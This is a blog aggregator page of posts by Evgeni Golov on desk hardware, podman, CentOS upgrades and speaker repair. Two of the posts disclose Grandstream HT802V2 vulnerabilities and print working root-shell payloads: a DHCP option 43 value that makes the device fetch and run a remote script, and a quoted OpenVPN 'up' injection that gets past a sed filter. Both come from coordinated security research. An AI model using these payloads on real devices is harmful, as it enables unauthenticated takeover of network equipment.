Search Results: "evgeni"

7 June 2025

Evgeni Golov: show your desk - 2025 edition

Back in 2020 I posted about my desk setup at home. Recently someone in our #remotees channel at work asked about WFH setups and given quite a few things changed in mine, I thought it's time to post an update. But first, a picture! standing desk with a monitor, laptop etc (Yes, it's cleaner than usual, how could you tell?!) desk It's still the same Flexispot E5B, no change here. After 7 years (I bought mine in 2018) it still works fine. If I'd have to buy a new one, I'd probably get a four-legged one for more stability (they got quite affordable now), but there is no immediate need for that. chair It's still the IKEA Volmar. Again, no complaints here. hardware Now here we finally have some updates! laptop A Lenovo ThinkPad X1 Carbon Gen 12, Intel Core Ultra 7 165U, 32GB RAM, running Fedora (42 at the moment). It's connected to a Lenovo ThinkPad Thunderbolt 4 Dock. It just works . workstation It's still the P410, but mostly unused these days. monitor An AOC U2790PQU 27" 4K. I'm running it at 150% scaling, which works quite decently these days (no comparison to when I got it). speakers As the new monitor didn't want to take the old Dell soundbar, I have upgraded to a pair of Alesis M1Active 330 USB. They sound good and were not too expensive. I had to fix the volume control after some time though. webcam It's still the Logitech C920 Pro. microphone The built in mic of the C920 is really fine, but to do conference-grade talks (and some podcasts ), I decided to get something better. I got a FIFINE K669B, with a nice arm. It's not a Shure, for sure, but does the job well and Christian was quite satisfied with the results when we recorded the Debian and Foreman specials of Focus on Linux. keyboard It's still the ThinkPad Compact USB Keyboard with TrackPoint. I had to print a few fixes and replacement parts for it, but otherwise it's doing great. Seems Lenovo stopped making those, so I really shouldn't break it any further. mouse Logitech MX Master 3S. The surface of the old MX Master 2 got very sticky at some point and it had to be replaced. other notepad I'm still terrible at remembering things, so I still write them down in an A5 notepad. whiteboard I've also added a (small) whiteboard on the wall right of the desk, mostly used for long term todo lists. coaster Turns out Xeon-based coasters are super stable, so it lives on! yubikey Yepp, still a thing. Still USB-A because... reasons. headphones Still the Bose QC25, by now on the third set of ear cushions, but otherwise working great and the odd 15 cushion replacement does not justify buying anything newer (which would have the same problem after some time, I guess). I did add a cheap (~10 ) Bluetooth-to-Headphonejack dongle, so I can use them with my phone too (shakes fist at modern phones). And I do use the headphones more in meetings, as the Alesis speakers fill the room more with sound and thus sometimes produce a bit of an echo. charger The Bose need AAA batteries, and so do some other gadgets in the house, so there is a technoline BC 700 charger for AA and AAA on my desk these days. light Yepp, I've added an IKEA Tertial and an ALDI "face" light. No, I don't use them much. KVM switch I've "built" a KVM switch out of an USB switch, but given I don't use the workstation that often these days, the switch is also mostly unused.

14 May 2025

Evgeni Golov: running modified containers with podman

Everybody (who runs containers) knows this situation: you've been running happycontainer:stable for a while and it's been great but now something external changed and you need to adjust the code while there is still no release with the patch. I've encountered exactly this when our Home-Assistant stopped showing the presence of our cat correctly, but we've also been discussing this at work recently. Now the most obvious (to me?) solution would be to build a new container, based on the original one, and perform the modifications at build time. Something like this:
FROM happycontainer:stable
RUN curl     patch -p1
But that's not interactive, and if you don't have a patch readily available, that's not what you want. (And I'll save you the idea of RUNing sed and friends to alter files!) You could run vim inside the container, but that requires vim to be installed there in the first place. And a reasonable configuration. And Well, turns out podman can mount the root fs of a running container.
[root@sai ~]# podman mount homeassistant
/var/lib/containers/storage/overlay/f3ac502d97b5681989dff
And if you're running as non-root, you'll get an error:
[container@sai ~]$ podman mount homeassistant
Error: cannot run command "podman mount" in rootless mode, must execute  podman unshare  first
Luckily the solution is in the error message - use podman unshare
[container@sai ~]$ podman unshare
[root@sai ~]# podman mount homeassistant
/home/container/.local/share/containers/storage/overlay/95d3809d53125e4d40ad05e52efaa5a48e6e61fe9b8a8478416ff44459c7eb31/merged
So in both cases (root and rootless) we get a path, which is the mounted root fs and we can edit things in there as we like.
[root@sai ~]# vi /home/container/.local/share/containers/storage/overlay/95d3809d53125e4d40ad05e52efaa5a48e6e61fe9b8a8478416ff44459c7eb31/merged/usr/src/homeassistant/homeassistant/components/surepetcare/binary_sensor.py
Once done, the container can be unmounted again, and the namespace left
[root@sai ~]# podman umount homeassistant
homeassistant
[root@sai ~]# exit
[container@sai ~]$
At this point we have modified the code inside the container, but the running process is still using the old code. If we restart the container now to restart the process, our changes will be lost. Instead, we can commit the changes as a new layer and tag the result.
[container@sai ~]$ podman commit homeassistant docker.io/homeassistant/home-assistant:stable
And now, when we restart the container, it will use the new code with our changes
[container@sai ~]$ systemctl --user restart homeassistant
Is this the best workflow you can get? Probably not. Does it work? Hell yeah!

4 April 2025

Gunnar Wolf: Naming things revisited

How long has it been since you last saw a conversation over different blogs syndicated at the same planet? Well, it s one of the good memories of the early 2010s. And there is an opportunity to re-engage! I came across Evgeni s post naming things is hard in Planet Debian. So, what names have I given my computers? I have had many since the mid-1990s I also had several during the decade before that, but before Linux, my computers didn t hve a formal name. Naming my computers something nice Linux gave me. I have forgotten many. Some of the names I have used:

Evgeni Golov: naming things is hard

I got a new laptop (a Lenovo Thinkpad X1 Carbon Gen 12, more on that later) and as always with new pets, it needed a name. My naming scheme is roughly "short japanese words that somehow relate to the machine". The current (other) machines at home are (not all really in use): Then, I happen to rent a few servers: I also had machines in the past, that are no longer with me: And also servers from the past: So, what shall I call the new one? It will be "juuni" ( ), which means 12. Creative, huh?

20 February 2025

Evgeni Golov: Unauthenticated RCE in Grandstream HT802V2 and probably others using gs_test_server DHCP vendor option

The Grandstream HT802V2 uses busybox' udhcpc for DHCP. When a DHCP event occurs, udhcpc calls a script (/usr/share/udhcpc/default.script by default) to further process the received data. On the HT802V2 this is used to (among others) parse the data in DHCP option 43 (vendor) using the Grandstream-specific parser /sbin/parse_vendor.
 
        [ -n "$vendor" ] &&  
                VENDOR_TEST_SERVER=" echo $vendor   parse_vendor   grep gs_test_server   cut -d' ' -f2 "
                if [ -n "$VENDOR_TEST_SERVER" ]; then
                        /app/bin/vendor_test_suite.sh $VENDOR_TEST_SERVER
                fi
 
According to the documentation the format is <option_code><value_length><value>. The only documented option code is 0x01 for the ACS URL. However, if you pass other codes, these are accepted and parsed too. Especially, if you pass 0x05 you get gs_test_server, which is passed in a call to /app/bin/vendor_test_suite.sh. What's /app/bin/vendor_test_suite.sh? It's this nice script:
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
cd /tmp
wget -q -t 2 -T 5 http://$ TEST_SERVER :$ TEST_SERVER_PORT /$ TEST_SCRIPT  
if [ "$?" = "0" ]; then
    echo "Finished downloading $ TEST_SCRIPT  from http://$ TEST_SERVER :$ TEST_SERVER_PORT "
    chmod +x $ TEST_SCRIPT 
        corefile_dec $ TEST_SCRIPT 
        if [ " head -n 1 $ TEST_SCRIPT  " = "#!/bin/sh" ]; then
                echo "Starting GS Test Suite..."
                ./$ TEST_SCRIPT  http://$ TEST_SERVER :$ TEST_SERVER_PORT 
        fi
fi
It uses the passed value to construct the URL http://<gs_test_server>:8080/vendor_test.sh and download it using wget. We probably can construct a gs_test_server value in a way that wget overwrites some system file, like it was suggested in CVE-2021-37915. But we also can just let the script download the file and execute it for us. The only hurdle is that the downloaded file gets decrypted using corefile_dec and the result needs to have #!/bin/sh as the first line to be executed. I have no idea how the encryption works. But luckily we already have a shell using the OpenVPN exploit and can use /bin/encfile to encrypt things! The result gets correctly decrypted by corefile_dec back to the needed payload. That means we can take a simple payload like:
#!/bin/sh
# you need exactly that shebang, yes
telnetd -l /bin/sh -p 1270 &
Encrypt it using encfile and place it on a webserver as vendor_test.sh. The test machine has the IP 192.168.42.222 and python3 -m http.server 8080 runs the webserver on the right port. This means the value of DHCP option 43 needs to be 05, 14 (the length of the string being the IP address) and 192.168.42.222. In Python:
>>> server = "192.168.42.222"
>>> ":".join([f' y:02x ' for y in [5, len(server)] + [ord(x) for x in server]])
'05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32'
So we set DHCP option 43 to 05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32 and trigger a DHCP run (/etc/init.d/udhcpc restart if you have a shell, or a plain reboot if you don't). And boom, root shell on port 1270 :) As mentioned earlier, this is closely related to CVE-2021-37915, where a binary was downloaded via TFTP from the gdb_debug_server NVRAM variable or via HTTP from the gs_test_server NVRAM variable. Both of these variables were controllable using the existing gs_config interface after authentication. But using DHCP for the same thing is much nicer, as it removes the need for authentication completely :) Affected devices Fix After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies /app/bin/vendor_test_suite.sh to
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
VENDOR_SCRIPT="/tmp/run_vendor.sh"
cd /tmp
wget -q -t 2 -T 5 http://$ TEST_SERVER :$ TEST_SERVER_PORT /$ TEST_SCRIPT  
if [ "$?" = "0" ]; then
    echo "Finished downloading $ TEST_SCRIPT  from http://$ TEST_SERVER :$ TEST_SERVER_PORT "
    chmod +x $ TEST_SCRIPT 
    prov_image_dec --in $ TEST_SCRIPT  --out $ VENDOR_SCRIPT 
    if [ " head -n 1 $ VENDOR_SCRIPT  " = "#!/bin/sh" ]; then
        echo "Starting GS Test Suite..."
        chmod +x $ VENDOR_SCRIPT 
        $ VENDOR_SCRIPT  http://$ TEST_SERVER :$ TEST_SERVER_PORT 
    fi
fi
The crucial part is that now prov_image_dec is used for the decoding, which actually checks for a signature (like on the firmware image itself), thus preventing loading of malicious scripts. Timeline

12 February 2025

Evgeni Golov: Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient. Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
echo "$(nvram get 8460)"   sed 's/;/\n/g' >> $ CONF_FILE 
After the fix it does
echo "$(nvram get 8460)"   sed -e 's/;/\n/g'   sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> $ CONF_FILE 
That means it deletes all lines that either contain script-security or start with a set of options that allow command execution. Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefor sets script-security 2, so injecting that is unnecessary. Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened. The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab neither via the web interface, nor via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just well for option names too. That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
Affected devices Fix After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)"   sed -e 's/;/\n/g' \
                           sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> $ CONF_FILE 
So far I was unable to inject any further commands in this block. Timeline

14 September 2024

Evgeni Golov: Fixing the volume control in an Alesis M1Active 330 USB Speaker System

I've a set of Alesis M1Active 330 USB on my desk to listen to music. They were relatively inexpensive (~100 ), have USB and sound pretty good for their size/price. They were also sitting on my desk unused for a while, because the left speaker didn't produce any sound. Well, almost any. If you'd move the volume knob long enough you might have found a position where the left speaker would work a bit, but it'd be quieter than the right one and stop working again after some time. Pretty unacceptable when you want to listen to music. Given the right speaker was working just fine and the left would work a bit when the volume knob is moved, I was quite certain which part was to blame: the potentiometer. So just open the right speaker (it contains all the logic boards, power supply, etc), take out the broken potentiometer, buy a new one, replace, done. Sounds easy? Well, to open the speaker you gotta loosen 8 (!) screws on the back. At least it's not glued, right? Once the screws are removed you can pull out the back plate, which will bring the power supply, USB controller, sound amplifier and cables, lots of cables: two pairs of thick cables, one to each driver, one thin pair for the power switch and two sets of "WTF is this, I am not going to trace pinouts today", one with a 6 pin plug, one with a 5 pin one. Unplug all of these! Yes, they are plugged, nice. Nope, still no friggin' idea how to get to the potentiometer. If you trace the "thin pair" and "WTF1" cables, you see they go inside a small wooden box structure. So we have to pull the thing from the front? Okay, let's remove the plastic part of the knob Right, this looks like a potentiometer. Unscrew it. No, no need for a Makita wrench, I just didn't have anything else in the right size (10mm). right Alesis M1Active 330 USB speaker with a Makita wrench where the volume knob is Still, no movement. Let's look again from the inside! Oh ffs, there are six more screws inside, holding the front. Away with them! Just need a very long PH1 screwdriver. Now you can slowly remove the part of the front where the potentiometer is. Be careful, the top tweeter is mounted to the front, not the main case and so is the headphone jack, without an obvious way to detach it. But you can move away the front far enough to remove the small PCB with the potentiometer and the LED. right Alesis M1Active 330 USB speaker open Great, this was the easy part! The only thing printed on the potentiometer is "A10K". 10K is easy -- 10kOhm. A?! Wikipedia says "A" means "logarithmic", but only if made in the US or Asia. In Europe that'd be "linear". "B" in US/Asia means "linear", in Europe "logarithmic". Do I need to tap the sign again? (The sign is a print of XKCD#927.) My multimeter says in this case it's something like logarithmic. On the right channel anyway, the left one is more like a chopping board. And what's this green box at the end? Oh right, this thing also turns the power on and off. So it's a power switch. Where the fuck do I get a logarithmic 10kOhm stereo potentiometer with a power switch? And then in the exact right size too?! Of course not at any of the big German electronics pharmacies. But AliExpress saves the day, again. It's even the same color! Soldering without pulling out the cable out of the case was a bit challenging, but I've managed it and now have stereo sound again. Yay! PS: Don't operate this thing open to try it out. 230V are dangerous!

22 May 2024

Evgeni Golov: Upgrading CentOS Stream 8 to CentOS Stream 9 using Leapp

Warning to the Planet Debian readers: the following post might shock you, if you're used to Debian's smooth upgrades using only the package manager. Leapp?! Contrary to distributions like Debian and Fedora, RHEL can't be upgraded using the package manager alone. Instead there is a tool called Leapp that takes care of orchestrating the update and also includes a set of checks whether a system can be upgraded at all. Have a look at the RHEL documentation about upgrading if you want more details on the process itself. You might have noticed that the title of this post says "CentOS Stream" but here I am talking about RHEL. This is mostly because Leapp was originally written with RHEL in mind. Upgrading CentOS 7 to EL8 When people started pondering upgrading their CentOS 7 installations, AlmaLinux started the ELevate project to allow upgrading CentOS 7 to CentOS Stream 8 but also to AlmaLinux 8, Rocky 8 or Oracle Linux 8. ELevate was essentially Leapp with patches to allow working on CentOS, which has different package signature keys, different OS release versioning, etc. Sadly these patches were never merged back into Leapp. Making Leapp work with CentOS Stream 8 (and other distributions) At some point I noticed that things weren't moving and EL8 to EL9 upgrades were coming closer (and I had my own systems that I wanted to be able to upgrade in place). Annoyed-Evgeni-Development is best development? Not sure, but it produced a set of patches that allowed some movement: However, this is not yet the end of the story. At least convert dot-less CentOS versions to X.999 is open, and another followup would be needed if we go that route. But I don't expect this to be merged soon, as the patch is technically wrong - yet it makes things mostly work. The big problem here is that CentOS Stream doesn't have X.Y versioning, just X as it's a constant stream with no point releases. Leapp however relies on X.Y versioning to know which package changes it needs to perform. Pretending CentOS Stream 8 is "RHEL" 8.999 works if you assume that Stream is always ahead of RHEL. This is however a CentOS only problem. I still need to properly test that, but I'd expect things to work fine with upstream Leapp on AlmaLinux/Rocky if you feed it the right signature and repository data. Actually upgrading CentOS Stream 8 to CentOS Stream 9 using Leapp Like I've already teased in my HPE rant, I've actually used that code to upgrade virt01.conova.theforeman.org to CentOS Stream 9. I've also used it to upgrade a server at home that's responsible for running important containers like Home Assistant and UniFi. So it's absolutely battle tested and production grade! It's also hungry for kittens. As mentioned above, you can't just use upstream Leapp, but I have a Copr: evgeni/leapp.
# dnf copr enable evgeni/leapp
# dnf install leapp leapp-upgrade-el8toel9
Apart from the software, we'll also need to tell it which repositories to use for the upgrade.
# vim /etc/leapp/files/leapp_upgrade_repositories.repo
[c9-baseos]
name=CentOS Stream $releasever - BaseOS
metalink=https://mirrors.centos.org/metalink?repo=centos-baseos-9-stream&arch=$basearch&protocol=https,http
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-centosofficial
gpgcheck=1
repo_gpgcheck=0
metadata_expire=6h
countme=1
enabled=1
[c9-appstream]
name=CentOS Stream $releasever - AppStream
metalink=https://mirrors.centos.org/metalink?repo=centos-appstream-9-stream&arch=$basearch&protocol=https,http
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-centosofficial
gpgcheck=1
repo_gpgcheck=0
metadata_expire=6h
countme=1
enabled=1
Depending on the setup and installed packages, more repositories might be needed. Just make sure that the $stream substitution is not used as Leapp doesn't override that and you'd end up with CentOS Stream 8 repos again. Once all that is in place, we can call leapp preupgrade and let it analyze the system. Ideally, the output will look like this:
# leapp preupgrade
 
============================================================
                      REPORT OVERVIEW                       
============================================================
Reports summary:
    Errors:                      0
    Inhibitors:                  0
    HIGH severity reports:       0
    MEDIUM severity reports:     0
    LOW severity reports:        3
    INFO severity reports:       3
Before continuing consult the full report:
    A report has been generated at /var/log/leapp/leapp-report.json
    A report has been generated at /var/log/leapp/leapp-report.txt
============================================================
                   END OF REPORT OVERVIEW                   
============================================================
But trust me, it won't ;-) As mentioned above, Leapp analyzes the system before the upgrade. Some checks can completely inhibit the upgrade, while others will just be logged as "you better should have a look". Firewalld Configuration AllowZoneDrifting Is Unsupported EL7 and EL8 shipped with AllowZoneDrifting=yes, but since EL9 this is not supported anymore. As this can potentially break the networking of the system, the upgrade gets inhibited. Newest installed kernel not in use Admit it, you also don't reboot into every new kernel available! Well, Leapp won't let that pass and inhibits the upgrade. Cannot perform the VDO check of block devices In EL8 there are two ways to manage VDO: using the dedicated vdo tool and via LVM. If your system uses LVM (it should!) but not VDO, you probably don't have the vdo package installed. But then Leapp can't check if your LVM devices really aren't VDO without the vdo tooling and will inhibit the upgrade. So you gotta install vdo for it to find out that you don't use VDO LUKS encrypted partition detected Yeah. Sorry. Using LUKS? Straight into the inhibit corner! But hey, if you don't use LUKS for / you can probably get away by deleting the inhibitwhenluks actor. That worked for me, but remember the kittens! Really upgrading CentOS Stream 8 to CentOS Stream 9 using Leapp The headings are getting silly, huh? Anyway, once leapp preupgrade is happy and doesn't throw any inhibitors anymore, the actual (real?) upgrade can be done by calling leapp upgrade. This will download all necessary packages and create an intermediate initramfs that contains all the things needed for the upgrade and ask you to reboot. Once booted, the upgrade itself takes somewhere between 5 and 10 minutes. Then another minute or 5 to relabel your disks with the new SELinux policy. And three reboots (into the upgrade initramfs, into SELinux relabel, into real OS) of a ProLiant DL325 - 5 minutes each? And then for good measure another one, to flip SELinux from permissive to enforcing. Are we done yet? Nope. There are a few post-upgrade tasks you get to do yourself. Yes, the switching of SELinux back to enforcing is one of them. Please don't forget it. Using the system after the upgrade A customer once said "We're not running those systems for the sake of running systems, but for the sake of running some application ontop of them". This is very true. libvirt doesn't support Spice/QXL In EL9, support for Spice/QXL was dropped, so if you try to boot a VM using it, libvirt will nicely error out with
Error starting domain: unsupported configuration: domain configuration does not support video model 'qxl'
Interestingly, because multiple parts of the VM are invalid, you can't edit it in virt-manager (at least the one in Fedora 39) as removing/fixing one part requires applying the new configuration which is still invalid. So virsh edit <vm> it is! Look for entries like
    <channel type='spicevmc'>
      <target type='virtio' name='com.redhat.spice.0'/>
      <address type='virtio-serial' controller='0' bus='0' port='2'/>
    </channel>
    <graphics type='spice' autoport='yes'>
      <listen type='address'/>
    </graphics>
    <audio id='1' type='spice'/>
    <video>
      <model type='qxl' ram='65536' vram='65536' vgamem='16384' heads='1' primary='yes'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x0'/>
    </video>
    <redirdev bus='usb' type='spicevmc'> 
      <address type='usb' bus='0' port='2'/> 
    </redirdev> 
    <redirdev bus='usb' type='spicevmc'> 
      <address type='usb' bus='0' port='3'/> 
    </redirdev>
and either just delete the or (better) replace them with VNC/cirrus
    <graphics type='vnc' port='-1' autoport='yes'>
      <listen type='address'/>
    </graphics>
    <audio id='1' type='none'/>
    <video>
      <model type='cirrus' vram='16384' heads='1' primary='yes'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x0'/>
    </video>
Podman needs re-login to private registries One of the machines I've updated runs Podman and pulls containers from GitHub which are marked as private. To do so, I have a personal access token that I've used to login to ghcr.io. After the CentOS Stream 9 upgrade (which included an upgrade to Podman 5), pulls stopped working with authentication/permission errors. No idea what exactly happened, but a simple podman login fixed this issue quickly.
$ echo ghp_token   podman login ghcr.io -u <user> --password-stdin
shim has an el8 tag One of the documented post-upgrade tasks is to verify that no EL8 packages are installed, and to remove those if there are any. However, when you do this, you'll notice that the shim-x64 package has an EL8 version: shim-x64-15-15.el8_2.x86_64. That's because the same build is used in both CentOS Stream 8 and CentOS Stream 9. Confusing, but should really not be uninstalled if you want the machine to boot ;-) Are we done yet? Yes! That's it. Enjoy your CentOS Stream 9!

15 May 2024

Evgeni Golov: Using HPONCFG on CentOS Stream 9 with OpenSSL 3.2

Today I've updated an HPE ProLiant DL325 G10 from CentOS Stream 8 to CentOS Stream 9 (details on that to follow) and realized that hponcfg was broken afterwards. As I do not have a support contract with HPE, I couldn't just yell at them in private, so I am doing this in public now ;-)
# hponcfg
HPE Lights-Out Online Configuration utility
Version 5.6.0 Date 11/30/2020 (c) 2005,2020 Hewlett Packard Enterprise Development LP
Error: Unable to locate SSL library.
       Install latest SSL library to use HPONCFG.
Welp, what the heck? But wait, 5.6.0 from 2020 looks old, let's update this first! hponcfg is part of the "Management Component Pack" (at least if you're not running RHEL or SLES where you get it via the "Service Pack for ProLiant" which requires a support contract) and can be downloaded from the Software Delivery Repository. The Software Delivery Repository tells you to configure it in /etc/yum.repos.d/mcp.repo as
[mcp]
name=Management Component Pack
baseurl=http://downloads.linux.hpe.com/repo/mcp/dist/dist_ver/arch/project_ver
enabled=1
gpgcheck=0
gpgkey=file:///etc/pki/rpm-gpg/GPG-KEY-mcp
gpgcheck=0? Suuure! Plain HTTP? Suuure! But it gets better! When you look at https://downloads.linux.hpe.com/repo/mcp/centos/ (you have to substitute dist with your distribution!) you'll see that there is no 9 folder and thus no packages for CentOS (Stream) 9. There are however folders for Oracle, Rocky and Alma. Phew. Let's take one of these!
[mcp]
name=Management Component Pack
baseurl=https://downloads.linux.hpe.com/repo/mcp/rocky/9/x86_64/current/
enabled=1
gpgcheck=1
gpgkey=https://downloads.linux.hpe.com/repo/mcp/GPG-KEY-mcp
dnf upgrade hponcfg updates it to hponcfg-6.0.0-0.x86_64 and:
# hponcfg
HPE Lights-Out Online Configuration utility
Version 6.0.0 Date 10/30/2022 (c) 2005,2022 Hewlett Packard Enterprise Development LP
Error: Unable to locate SSL library.
       Install latest SSL library to use HPONCFG.
Fuck. ldd doesn't show hponcfg being linked to libssl, do they dlopen() at runtime and fucked something up? ltrace to the rescue!
# ltrace hponcfg
 
popen("strings /bin/openssl   grep 'Ope"..., "r")            = 0x621700
fgets("OpenSSL 3.2.1 30 Jan 2024\n", 256, 0x621700)          = 0x7ffd870e2e10
strstr("OpenSSL 3.2.1 30 Jan 2024\n", "OpenSSL 3.0")         = nil
 
WAT? They run strings /bin/openssl grep 'OpenSSL' and compare the result with "OpenSSL 3.0"?! Sure, OpenSSL 3.2 in EL9 is rather fresh and didn't hit RHEL/Oracle/Alma/Rocky yet, but surely there are better ways to check for a compatible version of OpenSSL than THIS?! Anyway, I am not going to downgrade my OpenSSL. Neither will I patch it to pretend to be 3.0. But I can patch the hponcfg binary!
# vim /sbin/hponcfg
<go to line 146>
<replace 3.0 with 3.2>
:x
Yes, I used vim. Yes, it works. No, I won't guarantee this won't kill a kitten somewhere.
# ./hponcfg
HPE Lights-Out Online Configuration utility
Version 6.0.0 Date 10/30/2022 (c) 2005,2022 Hewlett Packard Enterprise Development LP
Firmware Revision = 2.44 Device type = iLO 5 Driver name = hpilo
USAGE:
  hponcfg  -?
  hponcfg  -h
  hponcfg  -m minFw
  hponcfg  -r [-m minFw] [-u username] [-p password]
  hponcfg  -b [-m minFw] [-u username] [-p password]
  hponcfg  [-a] -w filename [-m minFw] [-u username] [-p password]
  hponcfg  -g [-m minFw] [-u username] [-p password]
  hponcfg  -f filename [-l filename] [-s namevaluepair] [-v] [-m minFw] [-u username] [-p password]
  hponcfg  -i [-l filename] [-s namevaluepair] [-v] [-m minFw] [-u username] [-p password]
  -h,  --help           Display this message
  -?                    Display this message
  -r,  --reset          Reset the Management Processor to factory defaults
  -b,  --reboot         Reboot Management Processor without changing any setting
  -f,  --file           Get/Set Management Processor configuration from "filename"
  -i,  --input          Get/Set Management Processor configuration from the XML input
                        received through the standard input stream.
  -w,  --writeconfig    Write the Management Processor configuration to "filename"
  -a,  --all            Capture complete Management Processor configuration to the file.
                        This should be used along with '-w' option
  -l,  --log            Log replies to "filename"
  -v,  --xmlverbose     Display all the responses from Management Processor
  -s,  --substitute     Substitute variables present in input config file
                        with values specified in "namevaluepairs"
  -g,  --get_hostinfo   Get the Host information
  -m,  --minfwlevel     Minimum firmware level
  -u,  --username       iLO Username
  -p,  --password       iLO Password
For comparison, here is the diff --text output:
# diff -u --text /sbin/hponcfg ./hponcfg
--- /sbin/hponcfg   2022-08-02 01:07:55.000000000 +0000
+++ ./hponcfg   2024-05-15 09:06:54.373121233 +0000
@@ -143,7 +143,7 @@
 helpget_hostinforesetwriteconfigallfileinputlogminfwlevelxmlverbosesubstitutetimeoutdbgverbosityrebootusernamepasswordlibpath%Ah*Ag7Ar=AwIAaMAfRAiXAl\AmgAvrAs At Ad Ab Au Ap Azhgrbaw:f:il:m:vs:t:d:z:u:p:tmpXMLinputFile%2d.xmlw+Error: Syntax Error - Invalid options present.
 =O@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@ M@ M@aQ@ M@aQ@ N@ M@ N@ P@aQ@aQ@ M@ M@aQ@aQ@LN@aQ@ M@ O@ M@ M@ M@ M@aQ@aQ@ M@<!----><LOGINUSER_LOGINPASSWORD<LOGIN USER_LOGIN="%s" PASSWORD="%s"ERROR: LOGIN tag is missing.
 >ERROR: LOGIN end tag is missing.
-strings    grep 'OpenSSL 1'   grep 'OpenSSL 3'OpenSSL 1.0OpenSSL 1.1OpenSSL 3.0which openssl 2>&1/usr/bin/opensslOpenSSL location - %s
+strings    grep 'OpenSSL 1'   grep 'OpenSSL 3'OpenSSL 1.0OpenSSL 1.1OpenSSL 3.2which openssl 2>&1/usr/bin/opensslOpenSSL location - %s
 Current version %s
 No response from command.
Pretty sure it won't apply like this with patch, but you get the idea. And yes, double-giggles for the fact that the error message says "Install latest SSL library to use HPONCFG" and the issues is because I have the latest SSL library installed

14 May 2024

Evgeni Golov: Using Packit to build RPMs for projects that depend on or vendor your code

I am a huge fan of Packit as it allows us to provide RPMs to our users and testers directly from a pull-request, thus massively tightening the feedback loop and involving people who otherwise might not be able to apply the changes (for whatever reason) and "quickly test" something out. It's also a great way to validate that a change actually builds in a production environment, where no unnecessary development and test dependencies are installed. You can also run tests of the built packages on Testing Farm and automate pushing releases into Fedora/CentOS Stream, but this is neither a (plain) Packit advertisement post, nor is that functionality that I can talk about with a certain level of experience. Adam recently asked why we don't have Packit builds for our our Puppet modules and my first answer was: "well, puppet-* doesn't produce a thing we ship directly, so nobody dared to do it". My second answer was that I had blogged how to test a Puppet module PR with Packit, but I totally agree that the process was a tad cumbersome and could be improved. Now some madman did it and we all get to hear his story! ;-) What is the problem anyway? The Foreman Installer is a bit of Ruby code1 that provides a CLI to puppet apply based on a set of Puppet modules. As the Puppet modules can also be used outside the installer and have their own lifecycle, they live in separate git repositories and their releases get uploaded to the Puppet Forge. Users however do not want to (and should not have to) install the modules themselves. So we have to ship the modules inside the foreman-installer package. Packaging 25 modules for two packaging systems (we support Enterprise Linux and Debian/Ubuntu) seems like a lot of work. Especially if you consider that the main foreman-installer package would need to be rebuilt after each module change as it contains generated files based on the modules which are too expensive to generate at runtime. So we can ship the modules inside the foreman-installer source release, thus vendoring those modules into the installer release. To do so we use librarian-puppet with a Puppetfile and either a Puppetfile.lock for stable releases or by letting librarian-puppet fetch latest for 